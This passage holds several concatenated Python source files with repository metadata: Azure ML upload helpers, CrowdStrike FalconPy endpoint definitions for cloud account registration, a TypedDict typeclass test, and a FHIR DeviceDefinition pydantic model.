message=INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
tartget=ErrorTarget.DATA,
no_personal_data_message=INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
error_category=ErrorCategory.USER_ERROR,
)
return path + "/paths"
return path
def _validate_auto_delete_setting_in_data_output(
auto_delete_setting: Optional[Union[Dict, "AutoDeleteSetting"]]
) -> None:
# avoid specifying auto_delete_setting in job output now
if auto_delete_setting:
raise ValidationException(
message=AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
tartget=ErrorTarget.DATA,
no_personal_data_message=AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
error_category=ErrorCategory.USER_ERROR,
)
class FileUploadProgressBar(tqdm):
def __init__(self, msg: Optional[str] = None):
warnings.simplefilter("ignore", category=TqdmWarning)
is_windows = system() == "Windows" # Default unicode progress bar doesn't display well on Windows
super().__init__(unit="B", unit_scale=True, desc=msg, ascii=is_windows)
def update_to(self, response):
current = response.context["upload_stream_current"]
self.total = response.context["data_stream_total"]
if current:
self.update(current - self.n)
class DirectoryUploadProgressBar(tqdm):
def __init__(self, dir_size: int, msg: Optional[str] = None):
super().__init__(unit="B", unit_scale=True, desc=msg, colour="green")
self.total = dir_size
self.completed = 0
def update_to(self, response):
current = None
if response.context["upload_stream_current"]:
current = response.context["upload_stream_current"] + self.completed
self.completed = current
if current:
self.update(current - self.n)
def get_storage_info_for_non_registry_asset(
service_client, workspace_name: str, name: str, version: str, resource_group: str
) -> Dict[str, str]:
"""Get SAS uri and blob uri for non-registry asset. Note that this function won't return the same
SAS uri and blob uri for the same asset. It will return a new SAS uri and blob uri every time it is called.
:param service_client: Service client
:type service_client: AzureMachineLearningWorkspaces
:param workspace_name: The workspace name
:type workspace_name: str
:param name: Asset name
:type name: str
:param version: Asset version
:type version: str
:param resource_group: Resource group
:type resource_group: str
:return: The sas_uri and blob_uri
:rtype: Dict[str, str]
"""
request_body = PendingUploadRequestDto(pending_upload_type="TemporaryBlobReference")
response = service_client.code_versions.create_or_get_start_pending_upload(
resource_group_name=resource_group,
workspace_name=workspace_name,
name=name,
version=version,
body=request_body,
)
sas_info = {
"sas_uri": response.blob_reference_for_consumption.credential.sas_uri,
"blob_uri": response.blob_reference_for_consumption.blob_uri,
}
return sas_info
def _get_existing_asset_name_and_version(existing_asset):
import re
regex = r"/codes/([^/]+)/versions/([^/]+)"
arm_id = existing_asset.id
match = re.search(regex, arm_id)
name = match.group(1)
version = match.group(2)
return name, version
|
db98f7a492e6e4897216c2d47effd94207d59937
|
3eaef0fa3c0be14c47c6aa1e1fcfc51ccebe65c7
|
/src/falconpy/_endpoint/deprecated/_d4c_registration.py
|
0efc33cd4de0c83c7849c176983efa5836f7b076
|
[
"Unlicense"
] |
permissive
|
CrowdStrike/falconpy
|
9dd97ee0d703d35f7da100a4c78c91f1f5911478
|
b112fde2f3fbe44615f9a3b60b8210e89e51c1d5
|
refs/heads/main
| 2023-08-18T19:45:46.092966
| 2023-08-12T01:59:37
| 2023-08-12T01:59:37
| 312,363,599
| 256
| 109
|
Unlicense
| 2023-09-13T02:59:04
| 2020-11-12T18:33:23
|
Python
|
UTF-8
|
Python
| false
| false
| 5,506
|
py
|
_d4c_registration.py
|
"""Internal API endpoint constant library.
_______ __ _______ __ __ __
| _ .----.-----.--.--.--.--| | _ | |_.----|__| |--.-----.
|. 1___| _| _ | | | | _ | 1___| _| _| | <| -__|
|. |___|__| |_____|________|_____|____ |____|__| |__|__|__|_____|
|: 1 | |: 1 |
|::.. . | CROWDSTRIKE FALCON |::.. . | FalconPy
`-------' `-------'
OAuth2 API - Customer SDK
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <https://unlicense.org>
"""
_d4c_registration_endpoints = [
[
"GetCSPMAzureAccount",
"GET",
"/cloud-connect-azure/entities/account/v1",
"Return information about Azure account registration",
"d4c_registration",
[
{
"type": "array",
"items": {
"maxLength": 36,
"minLength": 36,
"pattern": "^[0-9a-z-]{36}$",
"type": "string"
},
"collectionFormat": "multi",
"description": "SubscriptionIDs of accounts to select for this status operation. "
"If this is empty then all accounts are returned.",
"name": "ids",
"in": "query"
},
{
"maxLength": 4,
"minLength": 3,
"pattern": "^(full|dry)$",
"type": "string",
"description": "Type of scan, dry or full, to perform on selected accounts",
"name": "scan-type",
"in": "query"
}
]
],
[
"CreateCSPMAzureAccount",
"POST",
"/cloud-connect-azure/entities/account/v1",
"Creates a new account in our system for a customer and generates a script for them to run "
"in their cloud environment to grant us access.",
"d4c_registration",
[
{
"name": "body",
"in": "body",
"required": True
}
]
],
[
"UpdateCSPMAzureAccountClientID",
"PATCH",
"/cloud-connect-azure/entities/client-id/v1",
"Update an Azure service account in our system by with the user-created client_id "
"created with the public key we've provided",
"d4c_registration",
[
{
"maxLength": 36,
"minLength": 36,
"pattern": "^[0-9a-z-]{36}$",
"type": "string",
"description": "ClientID to use for the Service Principal associated with the customer's Azure account",
"name": "id",
"in": "query",
"required": True
}
]
],
[
"GetCSPMAzureUserScriptsAttachment",
"GET",
"/cloud-connect-azure/entities/user-scripts-download/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"Azure environment as a downloadable attachment",
"d4c_registration",
[]
],
[
"GetCSPMAzureUserScripts",
"GET",
"/cloud-connect-azure/entities/user-scripts/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"Azure environment",
"d4c_registration",
[]
],
[
"GetCSPMCGPAccount",
"GET",
"/cloud-connect-gcp/entities/account/v1",
"Returns information about the current status of an GCP account.",
"d4c_registration",
[
{
"maxLength": 4,
"minLength": 3,
"pattern": "^(full|dry)$",
"type": "string",
"description": "Type of scan, dry or full, to perform on selected accounts",
"name": "scan-type",
"in": "query"
},
{
"type": "array",
"items": {
"pattern": "\\d{10,}",
"type": "string"
},
"collectionFormat": "multi",
"description": "Parent IDs of accounts",
"name": "ids",
"in": "query"
}
]
],
[
"CreateCSPMGCPAccount",
"POST",
"/cloud-connect-gcp/entities/account/v1",
"Creates a new account in our system for a customer and generates a new service account for them "
"to add access to in their GCP environment to grant us access.",
"d4c_registration",
[
{
"name": "body",
"in": "body",
"required": True
}
]
],
[
"GetCSPMGCPUserScripts",
"GET",
"/cloud-connect-gcp/entities/user-scripts/v1",
"Return a script for customer to run in their cloud environment to grant us access to their "
"GCP environment",
"d4c_registration",
[]
]
]
|
d19a82989acf1a4b217bc5e295b110ea43f7bcfe
|
2de1320d0d2c79b44708f9145271d1024dc20de1
|
/tests/test_typeclass/test_typed_dict.py
|
de776c35798b843a33321fdcfeade2598bc4b9f5
|
[
"BSD-2-Clause"
] |
permissive
|
dry-python/classes
|
b5dd8de65243ea5f38b565ebad34d62393f0a094
|
6f925f70285510d264a625c6afd0f26395b51475
|
refs/heads/master
| 2023-07-06T19:25:48.559783
| 2023-04-12T05:57:11
| 2023-04-12T05:57:11
| 217,621,930
| 625
| 29
|
BSD-2-Clause
| 2023-04-12T05:57:13
| 2019-10-25T22:14:08
|
Python
|
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
test_typed_dict.py
|
import sys
import pytest
from typing_extensions import TypedDict
from classes import typeclass
if sys.version_info[:2] >= (3, 9): # noqa: C901
pytestmark = pytest.mark.skip('Only python3.7 and python3.8 are supported')
else:
class _User(TypedDict):
name: str
registered: bool
class _UserDictMeta(type):
def __instancecheck__(cls, arg: object) -> bool:
return (
isinstance(arg, dict) and
isinstance(arg.get('name'), str) and
isinstance(arg.get('registered'), bool)
)
_Meta = type('_Meta', (_UserDictMeta, type(TypedDict)), {})
class UserDict(_User, metaclass=_Meta):
"""We use this class to represent a typed dict with instance check."""
@typeclass
def get_name(instance) -> str:
"""Example typeclass."""
@get_name.instance(delegate=UserDict)
def _get_name_user_dict(instance: UserDict) -> str:
return instance['name']
def test_correct_typed_dict():
"""Ensures that typed dict dispatch works."""
user: UserDict = {'name': 'sobolevn', 'registered': True}
assert get_name(user) == 'sobolevn'
@pytest.mark.parametrize('test_value', [
[],
{},
{'name': 'sobolevn', 'registered': None},
{'name': 'sobolevn'},
{'registered': True},
])
def test_wrong_typed_dict(test_value):
"""Ensures that typed dict dispatch works."""
with pytest.raises(NotImplementedError):
get_name(test_value)
|
4f4a8a39dcbb06e46861683e99b4b39d2d1b7b41
|
fdb9bdc6c4ab2f14ba71e544493706d5e275899f
|
/fhir/resources/devicedefinition.py
|
b9785e2cd321ccff5d218635189569e690a73f2d
|
[
"BSD-3-Clause"
] |
permissive
|
nazrulworld/fhir.resources
|
6ae8aea8180c611b0c5050759c6dcdf63e4cb061
|
1fd6ea476b27b3fcb8c4ef8f23bc51cf161e69e3
|
refs/heads/main
| 2023-08-30T18:27:27.277249
| 2023-07-03T19:57:06
| 2023-07-03T19:57:06
| 165,297,877
| 256
| 83
|
NOASSERTION
| 2023-08-24T15:34:05
| 2019-01-11T19:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 72,710
|
py
|
devicedefinition.py
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/DeviceDefinition
Release: R5
Version: 5.0.0
Build ID: 2aecd53
Last updated: 2023-03-26T15:21:02.749+11:00
"""
import typing
from pydantic import Field, root_validator
from pydantic.error_wrappers import ErrorWrapper, ValidationError
from pydantic.errors import MissingError, NoneIsNotAllowedError
from . import backboneelement, domainresource, fhirtypes
class DeviceDefinition(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
An instance of a medical-related component of a medical device.
The characteristics, operational status and capabilities of a medical-
related component of a medical device.
"""
resource_type = Field("DeviceDefinition", const=True)
chargeItem: typing.List[fhirtypes.DeviceDefinitionChargeItemType] = Field(
None,
alias="chargeItem",
title="Billing code or reference associated with the device",
description=None,
# if property is element of this resource.
element_property=True,
)
classification: typing.List[fhirtypes.DeviceDefinitionClassificationType] = Field(
None,
alias="classification",
title="What kind of device or device system this is",
description=None,
# if property is element of this resource.
element_property=True,
)
conformsTo: typing.List[fhirtypes.DeviceDefinitionConformsToType] = Field(
None,
alias="conformsTo",
title=(
"Identifies the standards, specifications, or formal guidances for the "
"capabilities supported by the device"
),
description=(
"Identifies the standards, specifications, or formal guidances for the "
"capabilities supported by the device. The device may be certified as "
"conformant to these specifications e.g., communication, performance, "
"process, measurement, or specialization standards."
),
# if property is element of this resource.
element_property=True,
)
contact: typing.List[fhirtypes.ContactPointType] = Field(
None,
alias="contact",
title="Details for human/organization for support",
description=(
"Contact details for an organization or a particular human that is "
"responsible for the device."
),
# if property is element of this resource.
element_property=True,
)
correctiveAction: fhirtypes.DeviceDefinitionCorrectiveActionType = Field(
None,
alias="correctiveAction",
title="Tracking of latest field safety corrective action",
description=None,
# if property is element of this resource.
element_property=True,
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Additional information to describe the device",
description=None,
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
deviceName: typing.List[fhirtypes.DeviceDefinitionDeviceNameType] = Field(
None,
alias="deviceName",
title="The name or names of the device as given by the manufacturer",
description=None,
# if property is element of this resource.
element_property=True,
)
guideline: fhirtypes.DeviceDefinitionGuidelineType = Field(
None,
alias="guideline",
title=(
"Information aimed at providing directions for the usage of this model "
"of device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
hasPart: typing.List[fhirtypes.DeviceDefinitionHasPartType] = Field(
None,
alias="hasPart",
title="A device, part of the current one",
description="A device that is part (for example a component) of the present device.",
# if property is element of this resource.
element_property=True,
)
identifier: typing.List[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Instance identifier",
description=(
"Unique instance identifiers assigned to a device by the software, "
"manufacturers, other organizations or owners. For example: handle ID. "
"The identifier is typically valued if the udiDeviceIdentifier, "
"partNumber or modelNumber is not valued and represents a different "
"type of identifier. However, it is permissible to still include those"
" identifiers in DeviceDefinition.identifier with the appropriate "
"identifier.type."
),
# if property is element of this resource.
element_property=True,
)
languageCode: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="languageCode",
title=(
"Language code for the human-readable text strings produced by the "
"device (all supported)"
),
description=None,
# if property is element of this resource.
element_property=True,
)
link: typing.List[fhirtypes.DeviceDefinitionLinkType] = Field(
None,
alias="link",
title=(
"An associated device, attached to, used with, communicating with or "
"linking a previous or new device model to the focal device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
manufacturer: fhirtypes.ReferenceType = Field(
None,
alias="manufacturer",
title="Name of device manufacturer",
description=(
"A name of the manufacturer or legal representative e.g. labeler. "
"Whether this is the actual manufacturer or the labeler or responsible "
"depends on implementation and jurisdiction."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
material: typing.List[fhirtypes.DeviceDefinitionMaterialType] = Field(
None,
alias="material",
title="A substance used to create the material(s) of which the device is made",
description=None,
# if property is element of this resource.
element_property=True,
)
modelNumber: fhirtypes.String = Field(
None,
alias="modelNumber",
title=(
"The catalog or model number for the device for example as defined by "
"the manufacturer"
),
description=(
"The model number for the device for example as defined by the "
"manufacturer or labeler, or other agency."
),
# if property is element of this resource.
element_property=True,
)
modelNumber__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_modelNumber", title="Extension field for ``modelNumber``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Device notes and comments",
description=(
"Descriptive information, usage information or implantation information"
" that is not captured in an existing element."
),
# if property is element of this resource.
element_property=True,
)
owner: fhirtypes.ReferenceType = Field(
None,
alias="owner",
title="Organization responsible for device",
description=(
"An organization that is responsible for the provision and ongoing "
"maintenance of the device."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Organization"],
)
packaging: typing.List[fhirtypes.DeviceDefinitionPackagingType] = Field(
None,
alias="packaging",
title=(
"Information about the packaging of the device, i.e. how the device is "
"packaged"
),
description=None,
# if property is element of this resource.
element_property=True,
)
partNumber: fhirtypes.String = Field(
None,
alias="partNumber",
title="The part number or catalog number of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
partNumber__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_partNumber", title="Extension field for ``partNumber``."
)
productionIdentifierInUDI: typing.List[typing.Optional[fhirtypes.Code]] = Field(
None,
alias="productionIdentifierInUDI",
title=(
"lot-number | manufactured-date | serial-number | expiration-date | "
"biological-source | software-version"
),
description=(
"Indicates the production identifier(s) that are expected to appear in "
"the UDI carrier on the device label."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"lot-number",
"manufactured-date",
"serial-number",
"expiration-date",
"biological-source",
"software-version",
],
)
productionIdentifierInUDI__ext: typing.List[
typing.Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(
None,
alias="_productionIdentifierInUDI",
title="Extension field for ``productionIdentifierInUDI``.",
)
property: typing.List[fhirtypes.DeviceDefinitionPropertyType] = Field(
None,
alias="property",
title=(
"Inherent, essentially fixed, characteristics of this kind of device, "
"e.g., time properties, size, etc"
),
description=(
"Static or essentially fixed characteristics or features of this kind "
"of device that are otherwise not captured in more specific attributes,"
" e.g., time or timing attributes, resolution, accuracy, and physical "
"attributes."
),
# if property is element of this resource.
element_property=True,
)
regulatoryIdentifier: typing.List[
fhirtypes.DeviceDefinitionRegulatoryIdentifierType
] = Field(
None,
alias="regulatoryIdentifier",
title="Regulatory identifier(s) associated with this device",
description=(
"Identifier associated with the regulatory documentation (certificates,"
" technical documentation, post-market surveillance documentation and "
"reports) of a set of device models sharing the same intended purpose, "
"risk class and essential design and manufacturing characteristics. One"
" example is the Basic UDI-DI in Europe."
),
# if property is element of this resource.
element_property=True,
)
safety: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="safety",
title="Safety characteristics of the device",
description=None,
# if property is element of this resource.
element_property=True,
)
shelfLifeStorage: typing.List[fhirtypes.ProductShelfLifeType] = Field(
None,
alias="shelfLifeStorage",
title="Shelf Life and storage information",
description=None,
# if property is element of this resource.
element_property=True,
)
udiDeviceIdentifier: typing.List[
fhirtypes.DeviceDefinitionUdiDeviceIdentifierType
] = Field(
None,
alias="udiDeviceIdentifier",
title="Unique Device Identifier (UDI) Barcode string",
description=(
"Unique device identifier (UDI) assigned to device label or package. "
"Note that the Device may include multiple udiCarriers as it either may"
" include just the udiCarrier for the jurisdiction it is sold, or for "
"multiple jurisdictions it could have been sold."
),
# if property is element of this resource.
element_property=True,
)
version: typing.List[fhirtypes.DeviceDefinitionVersionType] = Field(
None,
alias="version",
title="The version of the device or software",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinition`` according specification,
with preserving original sequence order.
"""
return [
"id",
"meta",
"implicitRules",
"language",
"text",
"contained",
"extension",
"modifierExtension",
"description",
"identifier",
"udiDeviceIdentifier",
"regulatoryIdentifier",
"partNumber",
"manufacturer",
"deviceName",
"modelNumber",
"classification",
"conformsTo",
"hasPart",
"packaging",
"version",
"safety",
"shelfLifeStorage",
"languageCode",
"property",
"owner",
"contact",
"link",
"note",
"material",
"productionIdentifierInUDI",
"guideline",
"correctiveAction",
"chargeItem",
]
class DeviceDefinitionChargeItem(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Billing code or reference associated with the device.
"""
resource_type = Field("DeviceDefinitionChargeItem", const=True)
chargeItemCode: fhirtypes.CodeableReferenceType = Field(
...,
alias="chargeItemCode",
title="The code or reference for the charge item",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["ChargeItemDefinition"],
)
count: fhirtypes.QuantityType = Field(
...,
alias="count",
title="Coefficient applicable to the billing code",
description=None,
# if property is element of this resource.
element_property=True,
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="A specific time period in which this charge item applies",
description=None,
# if property is element of this resource.
element_property=True,
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context to which this charge item applies",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionChargeItem`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"chargeItemCode",
"count",
"effectivePeriod",
"useContext",
]
class DeviceDefinitionClassification(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What kind of device or device system this is.
"""
resource_type = Field("DeviceDefinitionClassification", const=True)
justification: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="justification",
title="Further information qualifying this classification of the device model",
description=None,
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.CodeableConceptType = Field(
...,
alias="type",
title="A classification or risk class of the device model",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionClassification`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "type", "justification"]
class DeviceDefinitionConformsTo(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Identifies the standards, specifications, or formal guidances for the
capabilities supported by the device.
Identifies the standards, specifications, or formal guidances for the
capabilities supported by the device. The device may be certified as
conformant to these specifications e.g., communication, performance,
process, measurement, or specialization standards.
"""
resource_type = Field("DeviceDefinitionConformsTo", const=True)
category: fhirtypes.CodeableConceptType = Field(
None,
alias="category",
title=(
"Describes the common type of the standard, specification, or formal "
"guidance"
),
description="Describes the type of the standard, specification, or formal guidance.",
# if property is element of this resource.
element_property=True,
)
source: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="source",
title=(
"Standard, regulation, certification, or guidance website, document, or"
" other publication, or similar, supporting the conformance"
),
description=None,
# if property is element of this resource.
element_property=True,
)
specification: fhirtypes.CodeableConceptType = Field(
...,
alias="specification",
title=(
"Identifies the standard, specification, or formal guidance that the "
"device adheres to the Device Specification type"
),
description=(
"Code that identifies the specific standard, specification, protocol, "
"formal guidance, regulation, legislation, or certification scheme to "
"which the device adheres."
),
# if property is element of this resource.
element_property=True,
)
version: typing.List[typing.Optional[fhirtypes.String]] = Field(
None,
alias="version",
title=(
"The specific form or variant of the standard, specification or formal "
"guidance"
),
description=(
"Identifies the specific form or variant of the standard, "
"specification, or formal guidance. This may be a 'version number', "
"release, document edition, publication year, or other label."
),
# if property is element of this resource.
element_property=True,
)
version__ext: typing.List[
typing.Union[fhirtypes.FHIRPrimitiveExtensionType, None]
] = Field(None, alias="_version", title="Extension field for ``version``.")
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionConformsTo`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"category",
"specification",
"version",
"source",
]
class DeviceDefinitionCorrectiveAction(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Tracking of latest field safety corrective action.
"""
resource_type = Field("DeviceDefinitionCorrectiveAction", const=True)
period: fhirtypes.PeriodType = Field(
...,
alias="period",
title="Start and end dates of the corrective action",
description=None,
# if property is element of this resource.
element_property=True,
)
recall: bool = Field(
None,
alias="recall",
title="Whether the corrective action was a recall",
description="Whether the last corrective action known for this device was a recall.",
# if property is element of this resource.
element_property=True,
element_required=True,
)
recall__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_recall", title="Extension field for ``recall``."
)
scope: fhirtypes.Code = Field(
None,
alias="scope",
title="model | lot-numbers | serial-numbers",
description=(
"The scope of the corrective action - whether the action targeted all "
"units of a given device model, or only a specific set of batches "
"identified by lot numbers, or individually identified devices "
"identified by the serial name."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["model", "lot-numbers", "serial-numbers"],
)
scope__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_scope", title="Extension field for ``scope``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionCorrectiveAction`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "recall", "scope", "period"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_3455(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("recall", "recall__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionDeviceName(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
The name or names of the device as given by the manufacturer.
"""
resource_type = Field("DeviceDefinitionDeviceName", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="A name that is used to refer to the device",
description=(
"A human-friendly name that is used to refer to the device - depending "
"on the type, it can be the brand name, the common name or alias, or "
"other."
),
# if property is element of this resource.
element_property=True,
element_required=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="registered-name | user-friendly-name | patient-reported-name",
description=(
"The type of deviceName. RegisteredName | UserFriendlyName | "
"PatientReportedName."
),
# if property is element of this resource.
element_property=True,
element_required=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["registered-name", "user-friendly-name", "patient-reported-name"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``DeviceDefinitionDeviceName`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "modifierExtension", "name", "type"]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_2771(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("name", "name__ext"), ("type", "type__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class DeviceDefinitionGuideline(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Information aimed at providing directions for the usage of this model of
device.
"""
resource_type = Field("DeviceDefinitionGuideline", const=True)
contraindication: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="contraindication",
title=(
"A specific situation when a device should not be used because it may "
"cause harm"
),
description=None,
# if property is element of this resource.
element_property=True,
)
indication: typing.List[fhirtypes.CodeableConceptType] = Field(
None,
alias="indication",
title="A clinical condition for which the device was designed to be used",
description=None,
# if property is element of this resource.
element_property=True,
)
intendedUse: fhirtypes.String = Field(
None,
alias="intendedUse",
title=(
"A description of the general purpose or medical use of the device or "
"its function"
),
description=None,
# if property is element of this resource.
element_property=True,
)
intendedUse__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_intendedUse", title="Extension field for ``intendedUse``."
)
relatedArtifact: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="A source of information or reference for this guideline",
description=None,
# if property is element of this resource.
element_property=True,
)
usageInstruction: fhirtypes.Markdown = Field(
None,
alias="usageInstruction",
title=(
"Detailed written and visual directions for the user on how to use the "
"device"
),
description=None,
# if property is element of this resource.
element_property=True,
)
usageInstruction__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_usageInstruction",
title="Extension field for ``usageInstruction``.",
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
